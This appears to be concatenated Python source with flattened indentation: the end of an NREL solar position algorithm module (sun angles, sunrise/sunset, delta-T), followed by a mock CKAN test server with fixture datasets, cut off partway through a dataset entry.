U = 0.1*julian_ephemeris_millennium
e0 = (U*(U*(U*(U*(U*(U*(U*(U*(U*(2.45*U + 5.79) + 27.87) + 7.12) - 39.05)
- 249.67) - 51.38) + 1999.25) - 1.55) - 4680.93) + 84381.448)
return e0
def true_ecliptic_obliquity(mean_ecliptic_obliquity, obliquity_nutation):
# e0 = mean_ecliptic_obliquity
# deleps = obliquity_nutation
return mean_ecliptic_obliquity*0.0002777777777777778 + obliquity_nutation
# e = e0/3600.0 + deleps
# return e
def aberration_correction(earth_radius_vector):
# -20.4898 / (3600)
deltau = -0.005691611111111111/earth_radius_vector
return deltau
def apparent_sun_longitude(geocentric_longitude, longitude_nutation,
aberration_correction):
lamd = geocentric_longitude + longitude_nutation + aberration_correction
return lamd
def mean_sidereal_time(julian_day, julian_century):
julian_century2 = julian_century*julian_century
v0 = (280.46061837 + 360.98564736629*(julian_day - 2451545.0)
+ 0.000387933*julian_century2
- julian_century2*julian_century/38710000.0)
return v0 % 360.0
def apparent_sidereal_time(mean_sidereal_time, longitude_nutation,
true_ecliptic_obliquity):
v = mean_sidereal_time + longitude_nutation*cos(deg2rad*true_ecliptic_obliquity)
return v
def geocentric_sun_right_ascension(apparent_sun_longitude,
true_ecliptic_obliquity,
geocentric_latitude):
num = (sin(deg2rad*apparent_sun_longitude)
* cos(deg2rad*true_ecliptic_obliquity)
- tan(deg2rad*geocentric_latitude)
* sin(deg2rad*true_ecliptic_obliquity))
alpha = degrees(atan2(num, cos(
deg2rad*apparent_sun_longitude)))
return alpha % 360
def geocentric_sun_declination(apparent_sun_longitude, true_ecliptic_obliquity,
geocentric_latitude):
delta = degrees(asin(sin(deg2rad*geocentric_latitude) *
cos(deg2rad*true_ecliptic_obliquity) +
cos(deg2rad*geocentric_latitude) *
sin(deg2rad*true_ecliptic_obliquity) *
sin(deg2rad*apparent_sun_longitude)))
return delta
def local_hour_angle(apparent_sidereal_time, observer_longitude,
sun_right_ascension):
"""Measured westward from south."""
H = apparent_sidereal_time + observer_longitude - sun_right_ascension
return H % 360
def equatorial_horizontal_parallax(earth_radius_vector):
return 8.794 / (3600.0 * earth_radius_vector)
def uterm(observer_latitude):
u = atan(0.99664719*tan(deg2rad*observer_latitude))
return u
def xterm(u, observer_latitude, observer_elevation):
# 1/6378140.0 = const
x = (cos(u) + observer_elevation*1.5678552054360676e-07*cos(deg2rad*observer_latitude))
return x
def yterm(u, observer_latitude, observer_elevation):
# 1/6378140.0 = const
y = (0.99664719 * sin(u) + observer_elevation*1.5678552054360676e-07
* sin(deg2rad*observer_latitude))
return y
def parallax_sun_right_ascension(xterm, equatorial_horizontal_parallax,
local_hour_angle, geocentric_sun_declination):
x0 = sin(deg2rad*equatorial_horizontal_parallax)
x1 = deg2rad*local_hour_angle
num = -xterm*x0*sin(x1)
denom = (cos(deg2rad*geocentric_sun_declination) - xterm*x0 * cos(x1))
delta_alpha = degrees(atan2(num, denom))
return delta_alpha
def topocentric_sun_right_ascension(geocentric_sun_right_ascension,
parallax_sun_right_ascension):
alpha_prime = geocentric_sun_right_ascension + parallax_sun_right_ascension
return alpha_prime
def topocentric_sun_declination(geocentric_sun_declination, xterm, yterm,
equatorial_horizontal_parallax,
parallax_sun_right_ascension,
local_hour_angle):
x0 = sin(deg2rad*equatorial_horizontal_parallax)
num = ((sin(deg2rad*geocentric_sun_declination) - yterm
* x0)
* cos(deg2rad*parallax_sun_right_ascension))
denom = (cos(deg2rad*geocentric_sun_declination) - xterm
* x0
* cos(deg2rad*local_hour_angle))
delta = degrees(atan2(num, denom))
return delta
def topocentric_local_hour_angle(local_hour_angle,
parallax_sun_right_ascension):
H_prime = local_hour_angle - parallax_sun_right_ascension
return H_prime
def topocentric_elevation_angle_without_atmosphere(observer_latitude,
topocentric_sun_declination,
topocentric_local_hour_angle
):
r_observer_latitude = deg2rad*observer_latitude
r_topocentric_sun_declination = deg2rad*topocentric_sun_declination
e0 = degrees(asin(
sin(r_observer_latitude)
* sin(r_topocentric_sun_declination)
+ cos(r_observer_latitude)
* cos(r_topocentric_sun_declination)
* cos(deg2rad*topocentric_local_hour_angle)))
return e0
def atmospheric_refraction_correction(local_pressure, local_temp,
topocentric_elevation_angle_wo_atmosphere,
atmos_refract):
# switch sets delta_e when the sun is below the horizon
switch = topocentric_elevation_angle_wo_atmosphere >= -1.0 * (
0.26667 + atmos_refract)
delta_e = ((local_pressure / 1010.0) * (283.0 / (273.0 + local_temp))
* 1.02 / (60.0 * tan(deg2rad*(
topocentric_elevation_angle_wo_atmosphere
+ 10.3 / (topocentric_elevation_angle_wo_atmosphere
+ 5.11))))) * switch
return delta_e
def topocentric_elevation_angle(topocentric_elevation_angle_without_atmosphere,
atmospheric_refraction_correction):
e = (topocentric_elevation_angle_without_atmosphere
+ atmospheric_refraction_correction)
return e
def topocentric_zenith_angle(topocentric_elevation_angle):
theta = 90.0 - topocentric_elevation_angle
return theta
def topocentric_astronomers_azimuth(topocentric_local_hour_angle,
topocentric_sun_declination,
observer_latitude):
num = sin(deg2rad*topocentric_local_hour_angle)
denom = (cos(deg2rad*topocentric_local_hour_angle)
* sin(deg2rad*observer_latitude)
- tan(deg2rad*topocentric_sun_declination)
* cos(deg2rad*observer_latitude))
gamma = degrees(atan2(num, denom))
return gamma % 360.0
def topocentric_azimuth_angle(topocentric_astronomers_azimuth):
phi = topocentric_astronomers_azimuth + 180.0
return phi % 360.0
def sun_mean_longitude(julian_ephemeris_millennium):
M = julian_ephemeris_millennium*(julian_ephemeris_millennium*(
julian_ephemeris_millennium*(julian_ephemeris_millennium*(
-5.0e-7*julian_ephemeris_millennium - 6.5359477124183e-5)
+ 2.00276381406341e-5) + 0.03032028) + 360007.6982779) + 280.4664567
return M
#@jcompile('float64(float64, float64, float64, float64)', nopython=True)
def equation_of_time(sun_mean_longitude, geocentric_sun_right_ascension,
longitude_nutation, true_ecliptic_obliquity):
term = cos(deg2rad*true_ecliptic_obliquity)
E = (sun_mean_longitude - 0.0057183 - geocentric_sun_right_ascension +
longitude_nutation * term)
# limit between 0 and 360
E = E % 360
# convert to minutes
E *= 4.0
greater = E > 20.0
less = E < -20.0
other = (E <= 20.0) & (E >= -20.0)
E = greater * (E - 1440.0) + less * (E + 1440.0) + other * E
return E
def earthsun_distance(unixtime, delta_t):
"""Calculates the distance from the earth to the sun using the NREL SPA
algorithm described in [1].
Parameters
----------
unixtime : numpy array
Array of unix/epoch timestamps to calculate solar position for.
Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
delta_t : float
Difference between terrestrial time and UT. USNO has tables.
Returns
-------
R : array
Earth-Sun distance in AU.
References
----------
[1] Reda, I., Andreas, A., 2003. Solar position algorithm for solar
radiation applications. Technical report: NREL/TP-560- 34302. Golden,
USA, http://www.nrel.gov.
"""
jd = julian_day(unixtime)
jde = julian_ephemeris_day(jd, delta_t)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
return R
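# Usage sketch for earthsun_distance (not part of the original module; the
# pandas/numpy conversion mirrors the docstring's suggestion, and delta_t=67.0
# is only an illustrative value):
#     import numpy as np
#     import pandas as pd
#     times = pd.date_range('2020-06-21', periods=24, freq='H', tz='UTC')
#     unixtime = times.astype(np.int64)/10**9
#     au = [earthsun_distance(t, delta_t=67.0) for t in unixtime]
# Each element of au is the Earth-Sun distance in AU for one timestamp.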
def solar_position(unixtime, lat, lon, elev, pressure, temp, delta_t,
atmos_refract, sst=False):
"""Calculate the solar position using the NREL SPA algorithm described in
[1].
If numba is installed, the functions can be compiled
and the code runs quickly. If not, the functions
still evaluate but use numpy instead.
Parameters
----------
unixtime : numpy array
Array of unix/epoch timestamps to calculate solar position for.
Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
lat : float
Latitude to calculate solar position for
lon : float
Longitude to calculate solar position for
elev : float
Elevation of location in meters
pressure : int or float
avg. yearly pressure at location in millibars;
used for atmospheric correction
temp : int or float
avg. yearly temperature at location in
degrees C; used for atmospheric correction
    delta_t : float, optional
        Difference between terrestrial time and UT1. If delta_t is None,
        spa.calculate_deltat is used to estimate it from time.year and
        time.month of the pandas.DatetimeIndex; by default USNO historical
        data and predictions are used. For most simulations, specifying
        delta_t explicitly is sufficient.
        *Note: delta_t = None will break code using nrel_numba;
        this will be fixed in a future version.
    atmos_refract : float, optional
        The approximate atmospheric refraction (in degrees)
        at sunrise and sunset.
sst : bool, default False
If True, return only data needed for sunrise, sunset, and transit
calculations.
Returns
-------
list with elements:
apparent zenith,
zenith,
elevation,
apparent_elevation,
azimuth,
equation_of_time
References
----------
.. [1] I. Reda and A. Andreas, Solar position algorithm for solar radiation
applications. Solar Energy, vol. 76, no. 5, pp. 577-589, 2004.
.. [2] I. Reda and A. Andreas, Corrigendum to Solar position algorithm for
solar radiation applications. Solar Energy, vol. 81, no. 6, p. 838, 2007.
"""
jd = julian_day(unixtime)
jde = julian_ephemeris_day(jd, delta_t)
jc = julian_century(jd)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
L = heliocentric_longitude(jme)
B = heliocentric_latitude(jme)
Theta = geocentric_longitude(L)
beta = geocentric_latitude(B)
x0 = mean_elongation(jce)
x1 = mean_anomaly_sun(jce)
x2 = mean_anomaly_moon(jce)
x3 = moon_argument_latitude(jce)
x4 = moon_ascending_longitude(jce)
delta_psi, delta_epsilon = longitude_obliquity_nutation(jce, x0, x1, x2, x3, x4)
epsilon0 = mean_ecliptic_obliquity(jme)
epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
delta_tau = aberration_correction(R)
lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
v0 = mean_sidereal_time(jd, jc)
v = apparent_sidereal_time(v0, delta_psi, epsilon)
alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
delta = geocentric_sun_declination(lamd, epsilon, beta)
if sst: # numba: delete
return v, alpha, delta # numba: delete
m = sun_mean_longitude(jme)
eot = equation_of_time(m, alpha, delta_psi, epsilon)
H = local_hour_angle(v, lon, alpha)
xi = equatorial_horizontal_parallax(R)
u = uterm(lat)
x = xterm(u, lat, elev)
y = yterm(u, lat, elev)
delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha, H)
H_prime = topocentric_local_hour_angle(H, delta_alpha)
e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
H_prime)
delta_e = atmospheric_refraction_correction(pressure, temp, e0,
atmos_refract)
e = topocentric_elevation_angle(e0, delta_e)
theta = topocentric_zenith_angle(e)
theta0 = topocentric_zenith_angle(e0)
gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
phi = topocentric_azimuth_angle(gamma)
return [theta, theta0, e, e0, phi, eot]
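# Minimal usage sketch for solar_position (illustrative inputs, not part of the
# original module): 1592740800.0 is 2020-06-21 12:00:00 UTC, and the site
# values below are arbitrary examples.
#     res = solar_position(1592740800.0, lat=40.0, lon=-105.0, elev=1650.0,
#                          pressure=840.0, temp=15.0, delta_t=67.0,
#                          atmos_refract=0.5667)
#     apparent_zenith, zenith, elev_refr, elev_noatm, azimuth, eot_min = res
# With sst=True only (v, alpha, delta) are returned, as used by
# transit_sunrise_sunset below.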
try:
if IS_NUMBA: # type: ignore
try:
import numpy as np
except:
pass
import numba
import numpy as np
import threading
# This is 3x slower without nogil
@numba.njit(nogil=True)
def solar_position_loop(unixtime, loc_args, out):
"""Loop through the time array and calculate the solar position."""
lat = loc_args[0]
lon = loc_args[1]
elev = loc_args[2]
pressure = loc_args[3]
temp = loc_args[4]
delta_t = loc_args[5]
atmos_refract = loc_args[6]
sst = loc_args[7]
esd = loc_args[8]
for i in range(len(unixtime)):
utime = unixtime[i]
jd = julian_day(utime)
jde = julian_ephemeris_day(jd, delta_t)
jc = julian_century(jd)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
L = heliocentric_longitude(jme)
B = heliocentric_latitude(jme)
Theta = geocentric_longitude(L)
beta = geocentric_latitude(B)
x0 = mean_elongation(jce)
x1 = mean_anomaly_sun(jce)
x2 = mean_anomaly_moon(jce)
x3 = moon_argument_latitude(jce)
x4 = moon_ascending_longitude(jce)
# delta_psi = longitude_nutation(jce, x0, x1, x2, x3, x4)
# delta_epsilon = obliquity_nutation(jce, x0, x1, x2, x3, x4)
delta_psi, delta_epsilon = longitude_obliquity_nutation(jce, x0, x1, x2, x3, x4)
epsilon0 = mean_ecliptic_obliquity(jme)
epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
delta_tau = aberration_correction(R)
lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
v0 = mean_sidereal_time(jd, jc)
v = apparent_sidereal_time(v0, delta_psi, epsilon)
alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
delta = geocentric_sun_declination(lamd, epsilon, beta)
# if sst:
# out[0, i] = v
# out[1, i] = alpha
# out[2, i] = delta
# continue
m = sun_mean_longitude(jme)
eot = equation_of_time(m, alpha, delta_psi, epsilon)
H = local_hour_angle(v, lon, alpha)
xi = equatorial_horizontal_parallax(R)
u = uterm(lat)
x = xterm(u, lat, elev)
y = yterm(u, lat, elev)
delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha,
H)
H_prime = topocentric_local_hour_angle(H, delta_alpha)
e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
H_prime)
delta_e = atmospheric_refraction_correction(pressure, temp, e0,
atmos_refract)
e = topocentric_elevation_angle(e0, delta_e)
theta = topocentric_zenith_angle(e)
theta0 = topocentric_zenith_angle(e0)
gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
phi = topocentric_azimuth_angle(gamma)
out[0, i] = theta
out[1, i] = theta0
out[2, i] = e
out[3, i] = e0
out[4, i] = phi
out[5, i] = eot
def solar_position_numba(unixtime, lat, lon, elev, pressure, temp, delta_t,
atmos_refract, numthreads, sst=False, esd=False):
"""Calculate the solar position using the numba compiled functions
and multiple threads.
Very slow if functions are not numba compiled.
"""
# these args are the same for each thread
loc_args = np.array([lat, lon, elev, pressure, temp, delta_t,
atmos_refract, sst, esd])
# construct dims x ulength array to put the results in
ulength = unixtime.shape[0]
if sst:
dims = 3
elif esd:
dims = 1
else:
dims = 6
result = np.empty((dims, ulength), dtype=np.float64)
if unixtime.dtype != np.float64:
unixtime = unixtime.astype(np.float64)
if ulength < numthreads:
                warnings.warn('The number of threads is more than the length of '
                              'the time array. Only using %s threads.' % ulength)
numthreads = ulength
if numthreads <= 1:
solar_position_loop(unixtime, loc_args, result)
return result
# split the input and output arrays into numthreads chunks
split0 = np.array_split(unixtime, numthreads)
split2 = np.array_split(result, numthreads, axis=1)
chunks = [[a0, loc_args, split2[i]] for i, a0 in enumerate(split0)]
# Spawn one thread per chunk
threads = [threading.Thread(target=solar_position_loop, args=chunk)
for chunk in chunks]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return result
except:
pass
def transit_sunrise_sunset(dates, lat, lon, delta_t):
"""Calculate the sun transit, sunrise, and sunset for a set of dates at a
given location.
Parameters
----------
dates : array
Numpy array of ints/floats corresponding to the Unix time
for the dates of interest, must be midnight UTC (00:00+00:00)
on the day of interest.
lat : float
Latitude of location to perform calculation for
lon : float
Longitude of location
delta_t : float
Difference between terrestrial time and UT. USNO has tables.
Returns
-------
tuple : (transit, sunrise, sunset) localized to UTC
>>> transit_sunrise_sunset(1523836800, 51.0486, -114.07, 70.68302220312503)
(1523907360.3863413, 1523882341.570479, 1523932345.7781625)
"""
condition = (dates % 86400) != 0.0
if condition:
raise ValueError('Input dates must be at 00:00 UTC')
utday = (dates // 86400) * 86400
ttday0 = utday - delta_t
ttdayn1 = ttday0 - 86400.0
ttdayp1 = ttday0 + 86400.0
# index 0 is v, 1 is alpha, 2 is delta
utday_res = solar_position(utday, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
v = utday_res[0]
ttday0_res = solar_position(ttday0, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
ttdayn1_res = solar_position(ttdayn1, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
ttdayp1_res = solar_position(ttdayp1, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
m0 = (ttday0_res[1] - lon - v) / 360
cos_arg = ((-0.014543315936696236 - sin(radians(lat)) # sin(radians(-0.8333)) = -0.0145...
* sin(radians(ttday0_res[2]))) /
(cos(radians(lat)) * cos(radians(ttday0_res[2]))))
if abs(cos_arg) > 1:
cos_arg = nan
H0 = degrees(acos(cos_arg)) % 180
m = [0.0]*3
m[0] = m0 % 1
m[1] = (m[0] - H0 / 360.0)
m[2] = (m[0] + H0 / 360.0)
# need to account for fractions of day that may be the next or previous
# day in UTC
add_a_day = m[2] >= 1
sub_a_day = m[1] < 0
m[1] = m[1] % 1
m[2] = m[2] % 1
vs = [0.0]*3
for i in range(3):
vs[i] = v + 360.985647*m[i]
n = [0.0]*3
for i in range(3):
n[i] = m[i] + delta_t / 86400.0
a = ttday0_res[1] - ttdayn1_res[1]
if abs(a) > 2:
        a = a % 1
ap = ttday0_res[2] - ttdayn1_res[2]
if (abs(ap) > 2):
ap = ap % 1
b = ttdayp1_res[1] - ttday0_res[1]
if (abs(b) > 2):
b = b % 1
bp = ttdayp1_res[2] - ttday0_res[2]
if abs(bp) > 2:
bp = bp % 1
c = b - a
cp = bp - ap
alpha_prime = [0.0]*3
delta_prime = [0.0]*3
Hp = [0.0]*3
for i in range(3):
alpha_prime[i] = ttday0_res[1] + (n[i] * (a + b + c * n[i]))*0.5
delta_prime[i] = ttday0_res[2] + (n[i] * (ap + bp + cp * n[i]))*0.5
Hp[i] = (vs[i] + lon - alpha_prime[i]) % 360
if Hp[i] >= 180.0:
Hp[i] = Hp[i] - 360.0
#alpha_prime = ttday0_res[1] + (n * (a + b + c * n)) / 2 # this is vect
#delta_prime = ttday0_res[2] + (n * (ap + bp + cp * n)) / 2 # this is vect
#Hp = (vs + lon - alpha_prime) % 360
#Hp[Hp >= 180] = Hp[Hp >= 180] - 360
x1 = sin(radians(lat))
x2 = cos(radians(lat))
h = [0.0]*3
for i in range(3):
h[i] = degrees(asin(x1*sin(radians(delta_prime[i])) + x2 * cos(radians(delta_prime[i])) * cos(radians(Hp[i]))))
T = float((m[0] - Hp[0] / 360.0) * 86400.0)
R = float((m[1] + (h[1] + 0.8333) / (360.0 * cos(radians(delta_prime[1])) *
cos(radians(lat)) *
sin(radians(Hp[1])))) * 86400.0)
S = float((m[2] + (h[2] + 0.8333) / (360.0 * cos(radians(delta_prime[2])) *
cos(radians(lat)) *
sin(radians(Hp[2])))) * 86400.0)
if add_a_day:
S += 86400.0
if sub_a_day:
R -= 86400.0
transit = T + utday
sunrise = R + utday
sunset = S + utday
return transit, sunrise, sunset
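# Usage sketch (restating the docstring example; inputs and outputs are Unix
# seconds, UTC):
#     transit, sunrise, sunset = transit_sunrise_sunset(
#         1523836800, lat=51.0486, lon=-114.07, delta_t=70.68302220312503)
# The input must be midnight UTC, otherwise the ValueError above is raised.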
def calculate_deltat(year, month):
y = year + (month - 0.5)/12
if (2005 <= year) & (year < 2050):
t1 = (y-2000.0)
deltat = (62.92+0.32217*t1 + 0.005589*t1*t1)
elif (1986 <= year) & (year < 2005):
t1 = y - 2000.0
deltat = (63.86+0.3345*t1
- 0.060374*t1**2
+ 0.0017275*t1**3
+ 0.000651814*t1**4
+ 0.00002373599*t1**5)
elif (2050 <= year) & (year < 2150):
deltat = (-20+32*((y-1820)/100)**2
- 0.5628*(2150-y))
elif year < -500.0:
deltat = -20.0 + 32*(0.01*(y-1820.0))**2
elif (-500 <= year) & (year < 500):
t1 = y/100
deltat = (10583.6-1014.41*(y/100)
+ 33.78311*(y/100)**2
- 5.952053*(y/100)**3
- 0.1798452*(y/100)**4
+ 0.022174192*(y/100)**5
+ 0.0090316521*(y/100)**6)
elif (500 <= year) & (year < 1600):
t1 = (y-1000)/100
deltat = (1574.2-556.01*((y-1000)/100)
+ 71.23472*((y-1000)/100)**2
+ 0.319781*((y-1000)/100)**3
- 0.8503463*((y-1000)/100)**4
- 0.005050998*((y-1000)/100)**5
+ 0.0083572073*((y-1000)/100)**6)
elif (1600 <= year) & (year < 1700):
t1 = (y-1600.0)
deltat = (120-0.9808*(y-1600)
- 0.01532*(y-1600)**2
+ (y-1600)**3/7129)
elif (1700 <= year) & (year < 1800):
t1 = (y - 1700.0)
deltat = (8.83+0.1603*(y-1700)
- 0.0059285*(y-1700)**2
+ 0.00013336*(y-1700)**3
- (y-1700)**4/1174000)
elif (1800 <= year) & (year < 1860):
t1 = y - 1800.0
deltat = (13.72-0.332447*(y-1800)
+ 0.0068612*(y-1800)**2
+ 0.0041116*(y-1800)**3
- 0.00037436*(y-1800)**4
+ 0.0000121272*(y-1800)**5
- 0.0000001699*(y-1800)**6
+ 0.000000000875*(y-1800)**7)
elif (1860 <= year) & (year < 1900):
t1 = y-1860.0
deltat = (7.62+0.5737*(y-1860)
- 0.251754*(y-1860)**2
+ 0.01680668*(y-1860)**3
- 0.0004473624*(y-1860)**4
+ (y-1860)**5/233174)
elif (1900 <= year) & (year < 1920):
t1 = y - 1900.0
deltat = (-2.79+1.494119*(y-1900)
- 0.0598939*(y-1900)**2
+ 0.0061966*(y-1900)**3
- 0.000197*(y-1900)**4)
elif (1920 <= year) & (year < 1941):
t1 = y - 1920.0
deltat = (21.20+0.84493*(y-1920)
- 0.076100*(y-1920)**2
+ 0.0020936*(y-1920)**3)
elif (1941 <= year) & (year < 1961):
t1 = y - 1950.0
deltat = (29.07+0.407*(y-1950)
- (y-1950)**2/233
+ (y-1950)**3/2547)
elif (1961 <= year) & (year < 1986):
t1 = y-1975
deltat = (45.45+1.067*(y-1975)
- (y-1975)**2/260
- (y-1975)**3/718)
elif year >= 2150:
deltat = -20+32*((y-1820)/100)**2
return deltat
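# Worked example for the 2005-2050 branch (an approximate hand check, not an
# authoritative value):
#     y  = 2024 + (6 - 0.5)/12 ~= 2024.458, t1 = y - 2000 ~= 24.458
#     deltat = 62.92 + 0.32217*t1 + 0.005589*t1*t1 ~= 74.1
# so calculate_deltat(2024, 6) gives roughly 74 seconds of TT-UT difference.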
|
mock_ckan.py
|
from __future__ import print_function
import json
import re
import copy
import urllib
import SimpleHTTPServer
import SocketServer
from threading import Thread
PORT = 8998
class MockCkanHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# test name is the first bit of the URL and makes CKAN behave
# differently in some way.
# Its value is recorded and then removed from the path
self.test_name = None
test_name_match = re.match('^/([^/]+)/', self.path)
if test_name_match:
self.test_name = test_name_match.groups()[0]
if self.test_name == 'api':
self.test_name = None
else:
self.path = re.sub('^/([^/]+)/', '/', self.path)
if self.test_name == 'site_down':
return self.respond('Site is down', status=500)
# The API version is recorded and then removed from the path
api_version = None
version_match = re.match('^/api/(\d)', self.path)
if version_match:
api_version = int(version_match.groups()[0])
self.path = re.sub('^/api/(\d)/', '/api/', self.path)
if self.path == '/api/rest/package':
if api_version == 2:
dataset_refs = [d['id'] for d in DATASETS]
else:
dataset_refs = [d['name'] for d in DATASETS]
return self.respond_json(dataset_refs)
if self.path == '/api/action/package_list':
dataset_names = [d['name'] for d in DATASETS]
return self.respond_action(dataset_names)
if self.path.startswith('/api/rest/package/'):
dataset_ref = self.path.split('/')[-1]
dataset = self.get_dataset(dataset_ref)
if dataset:
return self.respond_json(
convert_dataset_to_restful_form(dataset))
if self.path.startswith('/api/action/package_show'):
params = self.get_url_params()
dataset_ref = params['id']
dataset = self.get_dataset(dataset_ref)
if dataset:
return self.respond_action(dataset)
if self.path.startswith('/api/action/group_show'):
params = self.get_url_params()
group_ref = params['id']
group = self.get_group(group_ref)
if group:
return self.respond_action(group)
if self.path.startswith('/api/search/dataset'):
params = self.get_url_params()
if params.keys() == ['organization']:
org = self.get_org(params['organization'])
dataset_ids = [d['id'] for d in DATASETS
if d['owner_org'] == org['id']]
return self.respond_json({'count': len(dataset_ids),
'results': dataset_ids})
else:
return self.respond(
'Not implemented search params %s' % params, status=400)
if self.path.startswith('/api/search/revision'):
revision_ids = [r['id'] for r in REVISIONS]
return self.respond_json(revision_ids)
if self.path.startswith('/api/rest/revision/'):
revision_ref = self.path.split('/')[-1]
assert api_version == 2
for rev in REVISIONS:
if rev['id'] == revision_ref:
return self.respond_json(rev)
self.respond('Cannot find revision', status=404)
# /api/3/action/package_search?fq=metadata_modified:[2015-10-23T14:51:13.282361Z TO *]&rows=1000
if self.path.startswith('/api/action/package_search'):
params = self.get_url_params()
if self.test_name == 'datasets_added':
if params['start'] == '0':
# when page 1 is retrieved, the site only has 1 dataset
datasets = [DATASETS[0]['name']]
elif params['start'] == '100':
# when page 2 is retrieved, the site now has new datasets,
# and so the second page has the original dataset, pushed
# onto this page now, plus a new one
datasets = [DATASETS[0]['name'],
DATASETS[1]['name']]
else:
datasets = []
else:
# ignore sort param for now
if 'sort' in params:
del params['sort']
if params['start'] != '0':
datasets = []
elif set(params.keys()) == set(['rows', 'start']):
datasets = ['dataset1', DATASETS[1]['name']]
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == '-organization:org1':
datasets = [DATASETS[1]['name']]
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == 'organization:org1':
datasets = ['dataset1']
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == '-groups:group1':
datasets = [DATASETS[1]['name']]
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == 'groups:group1':
datasets = ['dataset1']
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
'metadata_modified' in params['fq']:
assert '+TO+' not in params['fq'], \
'Spaces should not be decoded by now - seeing + '\
'means they were double encoded and SOLR doesnt like '\
'that'
datasets = [DATASETS[1]['name']]
else:
return self.respond(
'Not implemented search params %s' % params,
status=400)
out = {'count': len(datasets),
'results': [self.get_dataset(dataset_ref_)
for dataset_ref_ in datasets]}
return self.respond_action(out)
# if we wanted to server a file from disk, then we'd call this:
#return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
self.respond('Mock CKAN doesnt recognize that call', status=400)
def get_dataset(self, dataset_ref):
for dataset in DATASETS:
if dataset['name'] == dataset_ref or \
dataset['id'] == dataset_ref:
if self.test_name == 'invalid_tag':
dataset['tags'] = INVALID_TAGS
return dataset
def get_group(self, group_ref):
for group in GROUPS:
if group['name'] == group_ref or \
group['id'] == group_ref:
return group
def get_org(self, org_ref):
for org in ORGS:
if org['name'] == org_ref or \
org['id'] == org_ref:
return org
def get_url_params(self):
params_str = self.path.split('?')[-1]
params_unicode = urllib.unquote_plus(params_str).decode('utf8')
params = params_unicode.split('&')
return dict([param.split('=') for param in params])
def respond_action(self, result_dict, status=200):
response_dict = {'result': result_dict, 'success': True}
return self.respond_json(response_dict, status=status)
def respond_json(self, content_dict, status=200):
return self.respond(json.dumps(content_dict), status=status,
content_type='application/json')
def respond(self, content, status=200, content_type='application/json'):
self.send_response(status)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write(content)
self.wfile.close()
def serve(port=PORT):
'''Runs a CKAN-alike app (over HTTP) that is used for harvesting tests'''
# Choose the directory to serve files from
#os.chdir(os.path.join(os.path.dirname(os.path.abspath(__file__)),
# 'mock_ckan_files'))
class TestServer(SocketServer.TCPServer):
allow_reuse_address = True
httpd = TestServer(("", PORT), MockCkanHandler)
print('Serving test HTTP server at port {}'.format(PORT))
httpd_thread = Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
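# Usage sketch (not part of the original tests): start the mock server in the
# background and hit it over HTTP. The URL below is only an example.
#     serve()   # serves on http://localhost:8998
#     # e.g. GET http://localhost:8998/api/action/package_list
# A leading path segment such as /site_down/ selects a test behaviour, as
# handled at the top of do_GET above.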
def convert_dataset_to_restful_form(dataset):
dataset = copy.deepcopy(dataset)
dataset['extras'] = dict([(e['key'], e['value']) for e in dataset['extras']])
dataset['tags'] = [t['name'] for t in dataset.get('tags', [])]
return dataset
# Datasets are in the package_show form, rather than the RESTful form
DATASETS = [
{'id': 'dataset1-id',
'name': 'dataset1',
'title': 'Test Dataset1',
'owner_org': 'org1-id',
'tags': [{'name': 'test-tag'}],
'groups': [{'id': 'group1-id', 'name': 'group1'}],
'extras': []},
{
"id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"name": "cabinet-office-energy-use",
"private": False,
"maintainer_email": None,
"revision_timestamp": "2010-11-23T22:34:55.089925",
"organization":
{
"description": "The Cabinet Office supports the Prime Minister and Deputy Prime Minister, and ensure the effective running of government. We are also the corporate headquarters for government, in partnership with HM Treasury, and we take the lead in certain critical policy areas.\r\nCO is a ministerial department, supported by 18 agencies and public bodies\r\n\r\nYou can find out more at https://www.gov.uk/government/organisations/cabinet-office",
"created": "2012-06-27T14:48:40.244951",
"title": "Cabinet Office",
"name": "cabinet-office",
"revision_timestamp": "2013-04-02T14:27:23.086886",
"is_organization": True,
"state": "active",
"image_url": "",
"revision_id": "4be8825d-d3f4-4fb2-b80b-43e36f574c05",
"type": "organization",
"id": "aa1e068a-23da-4563-b9c2-2cad272b663e",
"approval_status": "pending"
},
"update_frequency": "other",
"metadata_created": "2010-08-02T09:19:47.600853",
"last_major_modification": "2010-08-02T09:19:47.600853",
"metadata_modified": "2014-05-09T22:00:01.486366",
"temporal_granularity": "",
"author_email": None,
